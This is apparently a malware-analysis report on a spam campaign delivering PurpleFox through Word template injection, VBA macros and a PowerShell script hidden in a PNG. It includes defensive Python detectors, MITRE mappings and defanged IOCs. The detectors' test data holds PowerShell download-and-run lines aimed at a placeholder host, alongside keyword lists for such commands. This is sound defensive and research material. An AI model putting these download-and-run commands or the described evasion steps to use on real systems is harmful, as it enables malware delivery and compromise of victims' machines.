- Cyble Research and Intelligence Labs (CRIL) came across a Word document file that spreads via spam email, employing an infection method for disseminating PurpleFox malware.
- In this malspam campaign, a VBA macro is employed to fetch the initial stage PowerShell script payload.
- The initial stage PowerShell script functions as a downloader responsible for retrieving a PNG image that conceals hidden content using a form of steganography technique.
- The code extracted from the PNG image is a second-stage PowerShell script, which also acts as a downloader: it retrieves an MSI payload, disguised as a JPG file, from a server.
- The MSI installer payload is the PurpleFox malware, which carries out malicious activities on the victim’s system.
On September 25th, CRIL encountered an intriguing Microsoft Word document named “Invoice-891920.docx” on VirusTotal. Subsequent investigation revealed that it employs a novel approach to deliver the malware known as “PurpleFox.”
PurpleFox, in operation since March 2018, is a formidable and malicious tool. It harnesses rootkit elements to elude detection by concealing registry keys and files on the compromised system. The core objective of PurpleFox is to disseminate additional malware onto the systems it manages to infiltrate.
During our further investigation, we came across a Twitter post by researcher @bomccss confirming a small number of Japanese emails with malware attachments named “ID-191304203986.docm.” This attachment propagates the PurpleFox malware using the same technique.
This technique begins with the initial stage of sending a spam email containing a Word file attachment. When the recipient opens the Word document, it initiates the download of another document file from a remote server. This file employs a VBA macro to fetch the first stage of PowerShell code. Subsequently, the PowerShell script is activated, fetching a PNG image containing concealed data through steganography.
Once the hidden content is extracted and decoded from the PNG image, it triggers the execution of a second-stage PowerShell script, which proceeds to download an MSI installer, disguised as a JPG file, from a server. This MSI installer is the PurpleFox malware payload, as illustrated in the figure below.
The initial infection starts with a spam email that includes a Word attachment with filenames like the following:
The emails include an attached Word document file, which can be in formats such as .doc, .docx, or .docm, and it contains an embedded URL within the document. To access this content, users are required to open the document and click “Enable Content,” as depicted below.
After clicking the “Enable Content” button, the file “Invoice-891920.docx” proceeds to retrieve another document file named “update.dotm” from a URL and executes it. The URL is present in the XML file named “settings.xml.rels,” which is located in the directory “\word\_rels” within the extracted “Invoice-891920.docx” file.
The figure below shows the content of the “settings.xml.rels” file.
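The template-injection relationship described above lives in word/_rels/settings.xml.rels. The following added example (not code from the original post, and not Cyble's tooling) scans a .docx for an attachedTemplate relationship whose target is an external http(s) URL; the sample document it builds is constructed test data with a placeholder URL, not the real update.dotm address.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

# Namespace and relationship type used by Office Open XML (OOXML) packages.
REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
ATTACHED_TEMPLATE = (
    "http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate"
)
RELS_PATH = "word/_rels/settings.xml.rels"


def find_remote_templates(docx_bytes):
    """Return (relationship_id, target) for every attachedTemplate relationship
    that points at an external http(s) location. A benign attached template has
    no TargetMode="External" and a local file path as its Target."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        if RELS_PATH not in zf.namelist():
            return hits
        root = ET.fromstring(zf.read(RELS_PATH))
    for rel in root.iter("{%s}Relationship" % REL_NS):
        if rel.get("Type") != ATTACHED_TEMPLATE:
            continue
        target = rel.get("Target", "")
        external = rel.get("TargetMode", "").lower() == "external"
        if external and target.lower().startswith(("http://", "https://")):
            hits.append((rel.get("Id"), target))
    return hits


def build_sample_docx(target, external=True):
    """Constructed test data: a minimal package whose settings.xml.rels
    references the given template target (no real document content)."""
    mode = ' TargetMode="External"' if external else ""
    rels = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="%s">'
        '<Relationship Id="rId1" Type="%s" Target="%s"%s/>'
        "</Relationships>"
    ) % (REL_NS, ATTACHED_TEMPLATE, target, mode)
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<document/>")
        zf.writestr(RELS_PATH, rels)
    return buf.getvalue()
```

On a real sample, read the .docx from disk and pass its bytes to find_remote_templates; a non-empty result is the remote-template indicator worth alerting on before the document is ever opened.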
Inside the Microsoft Word document template file “update.dotm,” there is an embedded VBA macro content stored in a binary file named “vbaProject.bin,” as shown below.
When this macro content is executed successfully, it triggers the execution of a PowerShell script that runs base64-encoded data. This encoded data is used to download a JPG file named “ace.jpg” from a remote server (shown below) and execute it.
The following figure displays the macro content within the document file, which contains the PowerShell script with the “DownloadString” function after decoding.
The file named “ace.jpg” pretends to be a JPG image file, but in reality, it is a PowerShell script that contains a base64 encoded string. This encoded content functions as a downloader for the first stage of a PowerShell script, as shown in the figure below.
First Stage PowerShell Script (Steganography)
The purpose of the code present in the first stage PowerShell script is to perform some form of image processing and then execute a PowerShell script obtained from the processed image.
Upon execution, the first stage PowerShell script downloads a PNG image named “all.png” from the below URL and then processes the pixel data of that image. It manipulates the color information of each pixel and stores the results in an array. After processing the image, the script converts the processed data into a string using ASCII encoding. The converted string is then executed as a command using “invoke-expression.”
In this scenario, manipulating pixel data in a particular way to conceal information or a command within an image represents a type of steganography.
The highlighted code in the figure depicts a nested loop structure used for the purpose of processing each individual pixel within an image. This code processes each pixel of an image by extracting and combining specific bits from the blue and green color components and then storing the result in an array. Subsequently, the array is converted into a string, with the intention of invoking it for further operations.
The figure below displays an image named “all.png,” which conceals hidden information within it, representing the next stage of a PowerShell script.
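An analyst recovering the hidden script from the pixel data described above needs the inverse of the nested loop in the figure. The following added example (not code from the original post) does that over RGB tuples and then triages whether the decoded bytes look like PowerShell rather than noise. It assumes one payload byte per pixel, with the high nibble in the low 4 bits of blue and the low nibble in the low 4 bits of green (the page only says "specific bits"); loading the PNG with Pillow is assumed and not shown, and the sample image is constructed test data.

```python
import string

# Assumed bit layout (the page only says "specific bits" of blue and green):
# one payload byte per pixel, high nibble in blue's low 4 bits, low nibble in
# green's low 4 bits, as in the public Invoke-PSImage scheme.
PRINTABLE = set(bytes(string.printable, "ascii"))
KEYWORDS = (b"invoke-expression", b"downloadstring", b"frombase64string", b"new-object")
# Constructed sample payload with a placeholder URL (not the campaign's script).
SAMPLE_PAYLOAD = b"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s2')"


def extract_nibble_payload(pixels, max_bytes=None):
    """pixels: (r, g, b) tuples in raster order, e.g. from Pillow's
    Image.open(path).convert("RGB").getdata() (Pillow assumed, not shown)."""
    out = bytearray()
    for i, (_, g, b) in enumerate(pixels):
        if max_bytes is not None and i >= max_bytes:
            break
        out.append(((b & 0x0F) << 4) | (g & 0x0F))
    return bytes(out)


def looks_like_script(data, min_printable=0.95):
    """Triage: the low nibbles of a clean image decode to noise, so a high
    printable ratio plus a PowerShell keyword strongly suggests embedded code."""
    if not data:
        return False
    ratio = sum(1 for c in data if c in PRINTABLE) / len(data)
    lowered = data.lower()
    return ratio >= min_printable and any(k in lowered for k in KEYWORDS)


def make_sample_pixels(payload, width, height, fill=(0x40, 0x80, 0xC0)):
    """Constructed test data: a flat-colour cover image with the payload written
    into the blue/green low nibbles; pixels past the payload keep the fill."""
    pixels = []
    for i in range(width * height):
        r, g, b = fill
        if i < len(payload):
            g = (g & 0xF0) | (payload[i] & 0x0F)
            b = (b & 0xF0) | (payload[i] >> 4)
        pixels.append((r, g, b))
    return pixels
```

Because the real script's length is not marked in the image, run looks_like_script over the leading bytes (or scan for the keyword offsets) rather than the whole decoded buffer, which will trail off into the cover image's noise.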
Second Stage PowerShell Script
The image below displays the PowerShell script that has been extracted from the PNG image.
Upon execution of the second-stage PowerShell script, it performs the following actions:
- Disables real-time monitoring in Windows Defender
- Creates an exclusion for the Windows directory
- Continuously attempts to download and install an MSI package from the following URL until it finds a specific registry key and its associated value
Within the PowerShell script, there is a C# code snippet enclosed in a here-string (delimited by @" and "@). This snippet imports the “msi.dll” library and declares two functions from it, MsiInstallProduct and MsiSetInternalUI, which are used to install MSI packages and to set the installer’s internal user-interface level.
Inside the script, there’s a loop that continues until it successfully fetches a registry value named “StayOnTop” with data “1” in the HKCU\Software\7-Zip registry key. This method is used to ascertain the successful execution of the payload. It repeatedly attempts to install the MSI package until it identifies this specific registry item.
The following image displays the content of the second-stage PowerShell script after it has been decoded from base64.
The file “SsdxxIp8DqeQ.jpg” downloaded from the server is an MSI installer disguised as a JPG file. It is dropped and executed at “C:\Windows\Installer\MSI7417.tmp” and has been identified as PurpleFox malware.
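Two of the downloads in this chain carry an image extension that does not match their content: ace.jpg is a PowerShell script with a base64 blob, and SsdxxIp8DqeQ.jpg is an MSI (an OLE compound file). The following added example (not code from the original post) is a small content-versus-extension check a proxy or sandbox hook could apply to such downloads; the decoy it builds is constructed test data with a placeholder URL.

```python
import base64
import re

# Leading bytes of the container formats that appear in this infection chain.
SIGNATURES = {
    b"\xD0\xCF\x11\xE0\xA1\xB1\x1A\xE1": "ole-cfb (MSI/legacy Office)",
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xFF\xD8\xFF": "jpeg",
    b"PK\x03\x04": "zip (docx/dotm/docm)",
    b"MZ": "pe",
}
IMAGE_EXT = {"jpg": "jpeg", "jpeg": "jpeg", "png": "png"}
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{200,}={0,2}")


def sniff(data):
    """Classify content by magic bytes; fall back to 'text' if the head is ASCII."""
    for magic, kind in SIGNATURES.items():
        if data.startswith(magic):
            return kind
    if data and all(c in b"\t\r\n" or 32 <= c < 127 for c in data[:512]):
        return "text"
    return "unknown"


def check_download(name, data):
    """Return (verdict, detail) for a file saved with an image extension.
    'mismatch-script': ASCII text whose base64 run decodes to PowerShell."""
    kind = sniff(data)
    expected = IMAGE_EXT.get(name.rsplit(".", 1)[-1].lower())
    if expected is None:
        return ("not-checked", kind)
    if kind == expected:
        return ("ok", kind)
    if kind == "text":
        m = B64_RUN.search(data)
        if m:
            try:
                decoded = base64.b64decode(m.group(0), validate=True)
            except ValueError:
                decoded = b""
            decoded = decoded.replace(b"\x00", b"").lower()  # also covers UTF-16LE -enc
            if b"downloadstring" in decoded or b"powershell" in decoded:
                return ("mismatch-script", "text carrying base64-encoded PowerShell")
        return ("mismatch", "text instead of " + expected)
    return ("mismatch", "%s instead of %s" % (kind, expected))


def sample_text_decoy():
    """Constructed test data: a script saved as .jpg, shaped like the ace.jpg stage."""
    cmd = b"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/next')"
    blob = base64.b64encode(cmd * 4)
    return b"$s=[Text.Encoding]::ASCII.GetString([Convert]::FromBase64String('" + blob + b"'));IEX $s\r\n"
```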
The figure below depicts the process tree of a PurpleFox deployment originating from a Microsoft Word document received via a spam email.
PurpleFox is a multifaceted malware downloader that specializes in propagating other malware files. It primarily infiltrates systems to distribute cryptocurrency mining software. Notably, it operates as a fileless rootkit and backdoor trojan. This malware strain was discovered in 2018 and has since played a role in various cyber campaigns, delivering ransomware, spyware, and cryptocurrency mining applications. Its primary target is the Windows operating system, and it commandeers compromised devices to act as hosts for its operations.
After examining the MSI payload, it became apparent that it contains three packaged files that are set to be dropped upon execution, specifically “sysupdate.log”, “winupdate32.log,” and “winupdate64.log.” The figure below shows the files extracted from the MSI payload.
During execution, the MSI payload copies either “winupdate32.log” or “winupdate64.log” into the C:\Windows directory, depending on whether the operating system is 32-bit or 64-bit. Despite the .log extension, these two files are in reality 32-bit and 64-bit PE DLL files, respectively. The DLLs are packed with VMProtect to deter debugging and analysis within virtual machine environments. The third file, sysupdate.log, is always dropped in the Windows folder, irrespective of the OS version.
As part of the execution process, these DLL files undergo renaming and sideloading, enabling them to carry out the malicious activities orchestrated by PurpleFox. The figure below shows the process tree of the PurpleFox infection.
PurpleFox malware is a highly sophisticated and malicious strain known for its diverse capabilities. It spreads through exploit kits, exploiting Windows vulnerabilities, and can execute in a fileless manner, making it challenging to detect. Once a system is compromised, it becomes part of a botnet, enabling remote control for various malicious purposes, including data theft and Distributed Denial-of-Service (DDoS) attacks. Purple Fox exhibits polymorphic code, constantly changing its appearance to evade signature-based antivirus solutions. It employs anti-detection techniques, propagates within networks, establishes persistence, and, in some versions, even possesses rootkit-like capabilities.
Spam emails with document attachments continue to be a preferred tactic for threat actors, primarily due to their high success rate in reaching a broad range of potential targets while also bypassing initial security measures. In a current campaign, threat actors have adopted the use of spam emails that include Microsoft Word attachments as the starting point for their operations. The initial VBA macro, activated through these attachments, employs PowerShell to fetch what appears to be a harmless PNG image. However, this image actually conceals the subsequent PowerShell script in a hidden manner, employing steganography techniques to remain undetected.
This sophisticated strategy is designed to avoid detection, maintain persistence, and maximize their success in compromising systems and networks. Furthermore, the final phase involves the deployment of a PurpleFox malware payload. The administrators of the Purple Fox remain active and consistently enhance their collection of new malware while also improving the existing malware versions they possess. The utilization of these tactics highlights the complexity of contemporary cyber threats, underscoring the importance of robust cybersecurity protocols, user awareness, and pre-emptive defense strategies to protect against ever-changing attack methods.
- The initial compromise takes place through spam emails. As a result, it’s recommended to implement robust email filtering solutions to detect and thwart the distribution of malicious attachments.
- When handling email attachments, particularly those from unknown senders, exercising caution is crucial. Verify the sender’s identity, particularly if an email seems suspicious.
- To enhance protection against potential threats, configure your Office software to have macros disabled as the default setting, enabling them only for trusted documents.
- Enforce policies and restrictions that prevent unauthorized PowerShell script execution.
- Keep the operating system, software, and applications up to date with the latest security patches and updates. Malware often targets known vulnerabilities.
- Deploy strong antivirus and anti-malware solutions to detect and remove malicious executables and scripts.
MITRE ATT&CK® Techniques
| Tactic | Technique | Description |
|---|---|---|
| Initial Access (TA0001) | Phishing (T1566.001) | This malware reaches users via spam emails. |
| Execution (TA0002) | Command and Scripting Interpreter: Visual Basic (T1059.005) | The document contains embedded VBA macros, which execute code when the document is opened. |
| Execution (TA0002) | Command and Scripting | PowerShell commands are used to download the next stage payload. |
| Persistence (TA0003) | Windows Service | Uses sc.exe to modify the status of services. |
| Defense Evasion (TA0005) | Virtualization/Sandbox Evasion (T1497) | Performs anti-VM/anti-debug techniques. |
| Defense Evasion (TA0005) | Disable or Modify Tools | The malware scans for VM- and debugger-related processes and terminates them. |
| Defense Evasion (TA0005) | Masquerading (T1036.008) | Downloads files with a non-matching file extension (content does not match the file extension). |
| Defense Evasion (TA0005) | Modify Registry (T1112) | Uses reg.exe to modify the Windows registry. |
| Defense Evasion (TA0005) | Template Injection (T1221) | The sample has suspicious references in Office document templates to conceal malicious code or force authentication attempts. |
| Defense Evasion (TA0005) | Services File Permissions | Uses cacls to modify the permissions of files. |
| Discovery (TA0007) | Process Discovery (T1057) | Queries a list of all running processes. |
| Discovery (TA0007) | Query Registry (T1012) | The malware examines the registry to extract system details. |
| Discovery (TA0007) | System Information | The malware gathers system information through PowerShell, Command Prompt (cmd), and WMIC. |
| Discovery (TA0007) | Security Software | May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory). |
|  | Application Layer Protocol | The malware uses TCP to interact with the C&C server. |
|  | Ingress Tool Transfer | The malware has the ability to download files from the C&C server. |
Indicators of Compromise (IOCs)
| Indicator | Type | Description |
|---|---|---|
|  |  | SsdxxIp8DqeQ.jpg (MSI file) – PurpleFox malware |
| hxxp://black-sun-a335[.]asyorfplmnv[.]workers[.]dev/mnwODBptK6jU/zKJFnbnzeum8/67856eed42115b6af39ecf6bb3e66f6ed8c13287/update[.]dotm | URL | URL of template injection |
| hxxp://black-sun-a335[.]asyorfplmnv[.]workers[.]dev/mnwODBptK6jU/zKJFnbnzeum8/37d4fddb6bf2de6611c6655a5cd37972fc33642d/ace[.]jpg | URL | 1st stage PowerShell |
| hxxp://black-sun-a335[.]asyorfplmnv[.]workers[.]dev/mnwODBptK6jU/T2qomNwfFUeS/62f331959dde379b2536caed26a74ae8460c0c30/all[.]png | URL | PNG image containing the 2nd stage PowerShell script (steganography) |
| hxxp://black-sun-a335[.]asyorfplmnv[.]workers[.]dev/mnwODBptK6jU/5hwtrLyyHFiv/7b0985c861986ec9e2087ade8273e544009d68e1/SsdxxIp8DqeQ[.]jpg | URL | PurpleFox payload, MSI file disguised as JPG |